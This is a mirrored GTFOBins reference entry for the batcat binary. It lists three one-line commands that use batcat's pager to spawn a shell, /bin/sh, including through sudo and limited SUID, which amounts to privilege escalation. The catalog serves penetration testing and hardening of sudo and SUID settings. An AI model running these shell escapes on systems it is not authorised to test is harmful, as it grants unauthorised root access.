1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/batcat.md
2023-01-07 20:20:23 +01:00

487 B

description functions
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. `--paging always` can be omitted provided that the output doesn't fit the screen.
shell limited-suid sudo
code
batcat --paging always /etc/profile !/bin/sh
code
./batcat --paging always /etc/profile !/bin/sh
code
sudo batcat --paging always /etc/profile !/bin/sh